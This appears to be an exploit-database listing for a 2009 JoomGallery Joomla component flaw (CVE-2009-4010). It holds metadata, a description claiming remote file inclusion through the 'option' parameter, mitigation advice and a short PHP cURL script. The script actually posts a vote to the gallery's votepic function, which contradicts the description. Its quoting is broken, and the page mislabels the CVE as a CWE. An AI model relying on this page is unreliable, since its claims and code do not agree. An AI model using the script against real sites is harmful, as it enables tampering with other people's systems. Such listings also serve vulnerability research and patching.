header-logo
Suggest Exploit
vendor:
JoomGallery
by:
José Carlos Norte
9.3
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: JoomGallery
Affected Version From: 1.5.2000
Affected Version To: 1.5.2002
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: a:joomla:joomgallery
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=50549
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Joomla! Component JoomGallery Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in Joomla! Component JoomGallery, which allows an attacker to include a remote file on the vulnerable server. This vulnerability is due to the lack of proper validation of user-supplied input in the 'option' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. Successful exploitation of this vulnerability can result in arbitrary code execution on the vulnerable server.

Mitigation:

Upgrade to the latest version of Joomla! Component JoomGallery or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://server/index.php?option=com_joomgallery&func=votepic&id="here id de voto"&Itemid=85");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,"imgvote=5&Votar%21=Votar%21");
curl_exec($ch);

curl_close($ch);
?>

Navigation

Suggest Exploit

Services By CQR